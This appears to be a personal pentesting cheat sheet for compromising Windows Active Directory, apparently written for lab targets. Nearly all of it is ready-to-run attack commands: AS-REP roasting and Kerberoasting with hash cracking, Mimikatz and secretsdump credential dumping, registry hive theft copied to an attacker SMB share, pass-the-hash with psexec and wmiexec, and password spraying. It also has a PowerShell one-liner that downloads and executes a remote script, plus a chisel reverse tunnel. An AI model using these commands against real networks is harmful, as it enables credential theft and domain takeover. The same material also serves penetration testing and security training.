-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathmxad
More file actions
517 lines (358 loc) · 15.4 KB
/
Copy pathmxad
File metadata and controls
517 lines (358 loc) · 15.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
===================================
PORTS
53 Simple DNS Plus - DNS is usually UDP, but sometimes TCP is needed for large packets
9389 MC-NMF .Net Message Framing - Active Directory Management Gateway Service
389 LDAP - For Queries to the Domain Controller
636 tcpwrapped - LDAPS for TLS/SSL - Port to use for LDAP querying using SSL
3269 tcpwrapped - Querying LDAP using Global Catalog using SSL
3268 MS AD LDAP - For queries targeted at the Global Catalog.
88 Kerberos-sec - Authentication protocol (88 and 464 are Standard Kerberos)
464 kpasswd5 - Kerberos Password Change - for changing/setting passwords against AD
135 RPC - Remote Procedure Call Endpoint Mapper service. Enables systems find services/ports
593 ncacn_http - RPC over HTTP - Used for Messaging Service
139 Netbios - Network Basic Input Output System name resolution to serve Windows File and Printer Sharing.
445 MS DS - Server Message Blocks (SMB) to serve Windows File and Printer Sharing.
3389 Remote Desktop
5985 HTTP SSDP/UPnP - WinRM (remote desktop)
===================================
Hacktricks
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://book.hacktricks.xyz/windows/active-directory-methodology
DNS 53 https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
KRB 88 https://book.hacktricks.xyz/network-services-pentesting/pentesting-kerberos-88
RPC 135 https://book.hacktricks.xyz/network-services-pentesting/135-pentesting-msrpc
LDAP 389,636,3268,3269 https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
===================================
Update
sudo vim /etc/hosts
DNS
bash
nmap -sC -sV -p 53,389,3268 192.168.200.5
dnsrecon -d 192.168.200.5 -r 192.168.200.5/24
Host
host -t ns mike.com
dnsenum mike.com --dnsserver dns.mike.com -f ~/tools/wordlists/dns.txt
Resolve
dig @192.168.200.5 mike.com
dig @192.168.200.5 forest.mike.com
Zone Transfer
dig axfr @192.168.200.5 mike.com
dnsrecon -d mike.com -t axfr
nmap --script=dns-zone-transfer -p 53 ns2.mike.com
===================================
AD Entry Scenario - 1
- SMB open-share
- Find and crack 'Groups.xml'
- SMB Authenticated
- Kerberoast with SVC account with creds.
smbmap -H 192.168.200.5 -u '' -p ''
smbclient -L //192.168.200.5
smbclient //192.168.200.5/share
smbmap -H 192.168.200.5 -R
get Groups.xml
gpp-decrypt abczyz = paxxword
smbclient //192.168.200.5/secrets -U mike.com\\SVC%paxxword
GetUserSPNs.py -request mike.com/SVC
===================================
AD Entry Scenario - 2
- Query LDAP w/o creds.
- Find Comments with Password
- Use creds to upload with WebDAV
- Found 'LAPS' Directory, so try LAPS pw-search in LDAP
- Connect with evil-winrm
nmap -n -sV --script "ldap* and not brute" 192.168.200.5
ldapsearch -v -x -b "DC=mike,DC=com" -H "ldap://192.168.200.5" "(objectclass=*)"
dir "C:\Program Files\LAPS"
ldapsearch -v -x -D bob@mike.com -w paxx -b "DC=mike,DC=com" -H "ldap://192.168.200.5" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
evil-winrm -i 192.168.200.5 -u administrator -p paxx
pxexec.py administrator@mike.com
===================================
AD Entry Scenario -3
- Get in with Upload Vuln
- Exploit service running as system
- winpeas can find auto-logon creds
- Mimikatz can find hashes/creds
- Re-use hash/creds on next-level box
- Find domain users and pivot till you get DA
cd C:\Users\Administrator\Downloads\
reg.exe save hklm\sam samx
reg.exe save hklm\security securityx
reg.exe save hklm\system systemx
net use \\192.168.200.5\share /USER:mike paxx
copy *x \\192.168.200.5\share\
secretsdump -sam samx -system systemx LOCAL
mimikatz_64.exe
privilege::debug
token::elevate
lsadump::cache
lsadump::secrets
sekurlsa::logonpasswords
psexec administrator@192.168.200.5 -hashes aadc123:abc123
===================================
Hunting with NO creds
RPC
nmap -p 135 --script=msrpc-enum 192.168.200.5
rpcclient -U '' -N 192.168.200.5
$> enumdomusers =Users - We can crack with these!!!
$> enumdomgroups =Groups
$> querygroup 0x200 =Domain Admins
$> querygroupmem 0x200 =Found rid:[0x1f4]
$> queryuser 0x1f4 =Administrator
SMB
sudo nmap -p 445 -v --script=smb-enum-shares,smb-enum-users 192.168.200.5
sudo nmap -p 139,445 -v --script=smb-vuln* 192.168.200.5
enum4linux -A 192.168.200.5
crackmapexec smb 192.168.200.5 -u guest -p "" --shares
smbmap -H 192.168.200.5
smbmap -H 192.168.200.5 -u '' -p ''
smbmap -H 192.168.200.5 -u mike -p mike
smbclient -L 192.168.200.5 -p12445
smbclient -L -N //192.168.200.5
smbclient -L //192.168.200.5
smbclient -L //192.168.200.5/ -U "guest"
smbclient //192.168.200.5/share
NFS showmount -e 192.168.200.5
LDAP
nmap -n -sV --script "ldap* and not brute" 192.168.200.5
ldapsearch -v -x -b "DC=mike,DC=com" -H "ldap://192.168.200.5" "(objectclass=*)"
impacket-lookupsid mike.com/guest@192.168.200.5
Brute from Userlist
crackmapexec smb 192.168.200.5 -d mike.com -u users.txt -p pass.txt
===================================
LDAP Domain Name
nmap -n -sV --script "ldap* and not brute" 192.168.200.5
LDAP User Search
Might find an interesting Comment. No password needed.
ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.200.5" "(objectclass=*)" | grep -i -e 'pass\|name\|desc'
LDAP Other Searches
ldapsearch -s base -x -H "ldap://192.168.200.5" | grep namingContexts
ldapsearch -x -H "ldap://192.168.200.5" -b "DC=mike,DC=com"
ldapsearch -x -H "ldap://192.168.200.5" -D '' -w '' -b "DC=mike,DC=com" | grep sAMAccountName:
ldapsearch -x -H "ldap://192.168.200.5" -b 'DC=mike,DC=com' -s sub | grep -i sam
ldapsearch -v -x -b "DC=mike,DC=com" -H "ldap://192.168.200.5" "(objectclass=*)" | grep -i -e 'pass\|name\|desc'
ldapsearch -x -H "ldap://192.168.200.5" -D "cn=admin,dc=mike,dc=com" -s sub "cn=*"
ldapdomaindump -u 'htb.local\bob' -p paxxword 192.168.200.5 -o ~/lab/ldap/
firefox ~/lab/ldap/domain_users.html
LDAP Query with Creds
Might find the 'LAPS' Admin password
dir "c:\Program Files" ..LAPS
ldapsearch -v -x -D bob@mike.com -w paxxword -b "DC=mike,DC=com" -H "ldap://192.168.200.5" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
===================================
LDAP Beautiful Results to HTML
ldapdomaindump -u 'htb.local\bob' -p paxxword 192.168.200.5 -o ~/lab/ldap/
firefox ~/lab/ldap/domain_users.html
firefox ~/lab/ldap/domain_computers.html
===================================
Hunt for Usernames
Find usernames in Samba Docs
smbclient -N -L //192.168.200.5/
crackmapexec smb 192.168.200.5 -u guest -p "" --shares
crackmapexec smb 192.168.200.5 -u guest -p "" --shares -M spider_plus
smbclient -N //192.168.200.5/shared
get docwithusers.txt
Find usernames from RPC
rpcclient -U "" 192.168.200.5
r> enumdomusers
Find users via LDAP (anonymous)
ldapsearch -x -h 192.168.200.5 -b base namingcontext
Find Domain users on box
lookupsid.py -no-pass mike.com
lookupsid.py mike.com/guest@192.168.200.5 > domusers.txt
Remove the domain prefix
cat domusers.txt | grep -i user | awk -F \\ '{print $2}'| awk '{print $1}'
vim allusers.txt
Johnny Leet
Tony Skids
Jack Goldenhand
Alexa Whitehat
Administrator ..add manually
Guest ..add manually
Mangle More Users
https://github.com/PinkDraconian/CTF-bash-tools
ctf-wordlist-names allusers.txt
===================================
Check userlist for Valid AD Users
kerbrute userenum -d mike.com --dc 192.168.200.5 formatted_name_wordlist.txt
===================================
Found Users (with no passwords)
AS-REP Roast
Crack Users that dont require creds to request TGT from the KDC (likely a Service Acct)
Requires port 88 (kerberos) and usernames to try AS-REP Roasting
impacket-GetNPUsers mike.com/ -no-pass -usersfile users.txt
for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip 192.168.200.5 mike.com/${user} | grep -v Impacket; done
hashcat -m 18200 hash.kerb $rockyou --force
john --wordlist=$rockyou asrephash.txt
evil-winrm -i 192.168.200.5 -u svc-admin -p paxxword
===================================
TOOLS
cd ~\tools\AD\
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share `pwd` -smb2support -username mike -password helps
net use \\192.168.162.46\share /USER:mike helps
cd C:\Windows\Temp\
cd C:\Users\Bob\Downloads\
copy GetUserSPNs.py \\192.168.162.46\share\
copy GetNPUsers.py \\192.168.162.46\share\
copy Invoke-Kerberoast.ps1 \\192.168.162.46\share\
copy getST.py \\192.168.162.46\share\
copy gMSADumper.py \\192.168.162.46\share\
copy SharpHound.ps1 \\192.168.162.46\share\
copy PowerView.ps1 \\192.168.162.46\share\
python3 -m http.server 80
powershell wget 192.168.162.46/SharpHound.exe -O SharpHound.exe
===================================
Quick-Roast (requires creds)
Need credentials for a domain user/service
echo "192.168.200.5 mike.com" >> /etc/hosts
GetUserSPNs.py -request domain/SVC_TGS
GetUserSPNs.py -request domain/bob:pass -dc-ip 192.168.200.5 -outputfile kbroast.txt
===================================
GMSA User Crack
gMSADumper.py -u 'mike' -p paxxword -d mydom.htb ..remote pull, with user/creds
GMSAPasswordReader.exe --accountname svc_apache ..target connected acct able to read gmsa
===================================
Silver Ticket
getST.py -spn www/dc.mike.com -impersonate Administrator domain/svc_gmsa$
===================================
ASREP Roastable Users (no creds needed)
GetNPUsers.py domain/bob
GetNPUsers.py domain/ -no-pass -usersfile userlist.txt
GetNPUsers.py domain/ -usersfile mylist.txt -format john -outputfile asrep.txt -dc-ip 192.168.200.5 -debug
GetNPUsers.py domain/bob:pass -request -format john -outputfile asrep.txt
john --wordlist=$rockyou --format=krb5asrep asrep.txt
===================================
Kerberoast - Domain Creds Required
Get a list of service-usernames which are associated with normal user accounts
Also grabs Tickets for cracking.
Example: We have Creds for "active.htb/SVC_TGS" - We can find "Administrator"
GetUserSPNs.py -request -dc-ip 192.168.200.5 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37...
hashcat -m 13100 -a 0 GetUserSPNs.out $rockyou --force
psexec.py active.htb/administrator@192.168.200.5
===================================
Invoke-Kerberoast.ps1 - Hailmary
Requires an admin/login on an AD box (you used mimikatz, right?)
Don't need the actual administrator Password.
Can enumerate all service principal names in the domain, request service tickets
Export them in a format ready for cracking in both John the Ripper and Hashcat
Completely eliminating the need for Mimikatz in this attack.
psexec administrator@192.168.200.5 -hashes aad3b4356:aad3b435
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share `pwd` -smb2support -username mike -password paxx
copy \\192.168.162.46\share\Invoke-Kerberoast.ps1
powershell.exe -nop -exec bypass
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII khash0.txt
copy khash0.txt \\192.168.162.46\share\
hashcat -m 13100 -a 0 khash0.txt $rockyou --force
Faster:
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
===================================
Crack
hashcat --example-hashes | less
hashcat --example-hashes | grep kerb -B2 -A2
hashcat -m 18200 hash.txt $rockyou
hashcat -m 13100 -a 0 khash0.txt $rockyou --force
===================================
Got Creds
Lookup Usernnames
lookupsid.py mike.com/bob:"paxxword1\!"@192.168.200.5
Check Samba Again
crackmapexec smb 192.168.200.5 -u bob -p "paxx" -M spider_plus
Cred Test
crackmapexec smb 192.168.200.5 -u jimmy -p "hacked"
psexec mike.com/jimmy@192.168.200.5
wmiexec mike.com/jimmy@192.168.200.5
Spray
kerbrute passwordspray --dc 192.168.200.5 -d mydomain users.txt 'Paxxword'
crackmapexec smb 192.168.200.5 -u bob -p Paxxword --shares
All Hashes
secretsdump mike.com/dcbob@192.168.200.5
Finally
wmiexec mike.com/administrator@192.168.200.5 -hashes abc123:abc123
===================================
Bloodhound
cd C:\Windows\Temp
copy \\192.168.200.5\share\SharpHound.exe
copy \\192.168.200.5\share\SharpHound.ps1
powershell -nop -noexit -exec bypass
PS> Import-Module .\SharpHound.ps1
PS> Invoke-BloodHound -CollectionMethod All
PS> Invoke-Bloodhound -collectionmethod all -domain mike.com -ldapuser svc-acct -ldappass paxxword
SharpHound.exe --CollectionMethod All
smbserver.py share . -smb2support -username mike -password helps
net use \\192.168.200.5\share /u:mike helps
copy 20220118140920_BloodHound.zip \\192.168.200.5\share\
net use /d \\192.168.200.5\share
nc -nvlp 9999 < 123456_BloodHound.zip
nc 192.168.200.5 9999 > Sharphound.zip
sudo neo4j start
bloodhound
Remote Bloodhound (needs creds)
bloodhound.py -c All,LoggedOn -u "bob" -p "paxx" -d mike.com -ns 192.168.200.5
===================================
Mimikatz/PTH/GetDC
sekurlsa::pth /user:bob /domain:corp.com /ntlm:abc123xyz /run:PowerShell.exe
PS> net user \\mydc
PS> klist
PS> PsExec.exe \\mydc cmd.exe
===================================
Port 88 Internal Only - Chisel and Roast
netstat -ap tcp
iwr -uri http://192.168.162.46/chisel_windows_amd64.exe -outfile chisel.exe
PS C:\windows\temp> .\chisel.exe client 192.168.200.5:8008 R:88:127.0.0.1:88 R:389:localhost:389
kali> /opt/chisel/chisel server -p 8008 --reverse
kali> GetUserSPNs.py -request -dc-ip 127.0.0.1 mike.com/bob -save -outputfile GetUserSPNs.out
kali> GetUserSPNs.py -request -dc-ip 127.0.0.1 mike.com/bob
Got the Kerberoast Hash
===================================
Domain Enums with PowerView
powershell.exe -nop -exec bypass
Import-Module .\PowerView.ps1
Roast
Invoke-Sharefinder
Invoke-Kerberoast
Invoke-BypassUAC
Users
Get-NetUser | select cn
Get-NetUser | select cn, objectsid, adspath
Get-NetUser -UserName Admin2
Computers
Get-NetComputer
Get-NetComputer -Ping
Get-NetComputer -fulldata
Get-NetComputer -fulldata | select cn, operatingsystem
Get-NetLoggedon -ComputerName client251
Get-NetSession -ComputerName dc01
Find-LocalAdminAccess
Invoke-EnumerationLocalAdmin
Get-NetLoggedon -ComputerName Domain-Controller.dc.local
Get-NetRDPSEssion -ComputerName Domain-Controller.dc.local
Groups
Get-NetGroup
Get-NetGroup -Domain dc.local
Get-NetGroup -AdminCount
Get-NetGroup -UserName JohnAdmin
Get-NetGroupMember -GroupName "Administrators"
Domain
Get-NetDomain
Get-DomainSID
Get-DomainPolicy
Get-NetDomainController
Get-NetGPO
===================================
AD/Domain
Powerview
powershell.exe -nop -exec bypass
Import-Module .\PowerView.ps1
Get-NetLoggedon -ComputerName client251
Get-NetSession -ComputerName dc01
Invoke-Kerberoast
Invoke-BypassUAC
===================================
PWN
evil-winrm -i 192.168.200.5 -u administrator -p paxxword
secretsdump -system SYSTEM -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
secretsdump.py -just-dc mrlky:Football#7@192.168.200.5 ..if 88 isnt exposed
secretsdump mike.com/administrator@192.168.200.5 ..Remote
===================================
Consider mxsam mxwinenum